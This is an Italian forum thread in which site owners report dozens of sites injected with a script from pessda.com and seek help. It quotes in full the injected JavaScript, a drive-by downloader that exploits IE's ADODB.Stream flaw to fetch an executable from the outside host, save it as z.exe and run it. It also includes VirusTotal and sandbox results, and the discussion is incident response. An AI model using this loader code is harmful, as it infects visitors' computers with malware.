pessda.com: decine di siti infestati

[Delo80]

Salve a tutti ragazzi

questa mattina mi sono trovato decine di miei siti presenti in un unico server infestati da questa riga di comando

<script src="http://pessda.com/sp.php"></script>

il contenuto di questo file è il seguente

if (navigator.appName == "Microsoft Internet Explorer") { var obj = document.createElement("object"); obj.setAttribute("id","obj"); obj.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); try { var o = new Array ("P","T","H","L","M","X","2","l",".","x","s","m "); var adoStream = obj.CreateObject("adodb.stream", ""); var shellApplication = obj.CreateObject("Shell.Application", ""); var a = o[11]+o[10]+o[9]+o[11]+o[7]+o[6]+o[8]+o[5]+o[4]+o[3]+o[2]+o[1]+o[1]+o[0]; var xmlHTTP = obj.CreateObject(a, ""); xmlHTTP.open("GET", "http://pessda.com/u.php", false); xmlHTTP.send(); adoStream.type = 1; adoStream.open(); adoStream.Write(xmlHTTP.responseBody); var fileSystem = obj.CreateObject("Scripting.FileSystemObject","") var filePath = fileSystem.BuildPath(fileSystem.GetSpecialFolder(2 ), "z.exe"); adoStream.SaveToFile(filePath, 2); shellApplication.ShellExecute(filePath); } catch(e){ } }


qualcuno sa spiegarmi cosa è successo?

Grazie a tutti

[fcaldera]

per caso in queste decine di siti permetti in qualche modo agli utenti di poter scrivere qualcosa? (ad esempio un blog, un modulo contatti, un forum...) ?

Se sì, allora è probabile che i tuoi campi di input non filtrino i tag html e questo è il risultato di un attacco XSS

[Delo80]

Ineffetti è installato un forum phpBB sul server ma non è permesso il linguaggio HTML

E' installato anche jomla, che abbiamo usato per test pochi giorni fa...dici sia questo il problema?
Grazie millle

[Xinod]

sposto in "sicurezza"
ciao

[Al è qui]

Spesso quei codici vengono usati per downloadare poi dialer o altro dai siti.
Se ne hai ancora di quei messaggi tienili e spostali se sono in un forum.
Se nel forum, invia tutto all'abuse, in questo caso:

noc@godaddy.com
abuse@godaddy.com
spam@uce.gov

[Habanero]

Ovviamente provvedi subito a cancellare quelle righe poichè permettono di scaricare malware sul pc di chi visita quelle pagine.

L'exploit funziona solo con IE (guardacaso). Direi che viene sfruttata la vulnerabilità di MDAC descritta nel bollettino di sicurezza microsoft MS06-014. Il codice usa l'oggetto adodb.stream al fine di scaricare dal quel sito il file u.php, che in realtà è un eseguibile, attraverso una richiesta http asincrona. Tale eseguibile viene salvato col nome di z.exe all'interno della cartella temp. Da qui viene eseguito.

Il file è compresso in upx.. non l'ho analizzato in dettaglio ma una rapida analisi su VirusTotal non rileva nulla di buono:

File "z.exe" received on 01.03.2007 at 21:57:37 (CET) is being scanned by VirusTotal in this moment. Results will be shown as they're generated.

Antivirus Version Update Result
AntiVir 7.3.0.21 01.03.2007 HEUR/Crypted
Authentium 4.93.8 12.30.2006 Possibly a new variant of W32/new-malware!Maximus
Avast 4.7.892.0 12.30.2006 no virus found
AVG 386 01.03.2007 no virus found
BitDefender 7.2 01.03.2007 no virus found
CAT-QuickHeal 8.00 01.03.2007 no virus found
ClamAV devel-20060426 01.03.2007 no virus found
DrWeb 4.33 01.03.2007 DLOADER.Trojan
eSafe 7.0.14.0 01.02.2007 suspicious Trojan/Worm
eTrust-InoculateIT 23.73.103 01.03.2007 no virus found
eTrust-Vet 30.3.3299 01.03.2007 no virus found
Ewido 4.0 01.03.2007 no virus found
Fortinet 2.82.0.0 01.03.2007 suspicious
F-Prot 3.16f 01.02.2007 Possibly a new variant of W32/new-malware!Maximus
F-Prot4 4.2.1.29 01.03.2007 W32/new-malware!Maximus
Ikarus T3.1.0.27 01.03.2007 no virus found
Kaspersky 4.0.2.24 01.03.2007 no virus found
McAfee 4931 01.03.2007 no virus found
Microsoft 1.1904 01.03.2007 no virus found
NOD32v2 1955 01.03.2007 probably unknown NewHeur_PE virus
Norman 5.80.02 12.31.2007 W32/FileInfector
Panda 9.0.0.4 01.03.2007 Bck/ServU.GJ
Prevx1 V2 01.03.2007 no virus found
Sophos 4.13.0 01.02.2007 no virus found
Sunbelt 2.2.907.0 12.18.2006 VIPRE.Suspicious
TheHacker 6.0.3.141 01.01.2007 no virus found
UNA 1.83 01.03.2007 no virus found

Aditional Information
File size: 17408 bytes
MD5: 7608d5398c775579e71525d679dd118c
SHA1: b3bb2efc1db28e44c292d9b82e0b76b5bd8b4b91
packers: UPX
packers: UPX
packers: UPX
norman sandbox: [ General information ]
* **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: ANALYSIS@NORMAN.NO - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**.
* Decompressing UPX.
* File length: 17408 bytes.

[ Changes to registry ]
* Deletes value "Svchost" in key "HKLMSoftwareMicrosoftWindowsCurrentVersionRun ".
* Sets value "SvchostVersion"="3" in key "HKCUSoftwareMicrosoftWindowsCurrentVersion".

[ Spreading by infecting files ]
* File infector; modifies existing executable files.

Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

Rimane infine da capire come sia stato iniettato quel codice nelle pagine...

[Al è qui]

Mah, aspettiamo la risposta di Delo80 ma credo proprio si tratti di post nel forum... se non ho capito male.

[TheMonsterITA]

CIao ragazzi e grazie tutti per l'attenzione.
Sono il socio di Delo.
Per ora abbiamo eliminato suddetto trojan da tutte le home dei siti risiedenti sul server.
In pratica questo script si e' collocato due volte nel codice delle home dei siti presenti sullo stesso server.
Abbiamo contattato il server per delucidazioni e collaborazioni.
Allo stato attuale sembrerebbe un'intrusione come detto ma scartando il forum che non permette quel tipo di attacco (a primo avviso), sembrerebbe dovuto ad un'installazione di joomla per test
su altro sito.
In pratica il'hosting permette di autoinstallare joomla ma noi non avendo settato nulla, avrà concesso di default poteri su poteri.
Cmq stiamo in continuo controllo e se avete ulteriori consigli siamo con le orecchie tese ad ascoltarli.
Grazie di tutto ancora

[TheMonsterITA]

Da ulktime verifiche, sembra proprio un accesso tramite joomla non configurato ottimamente.
Se avete altri consigli o verifiche sono a tutt'orecchi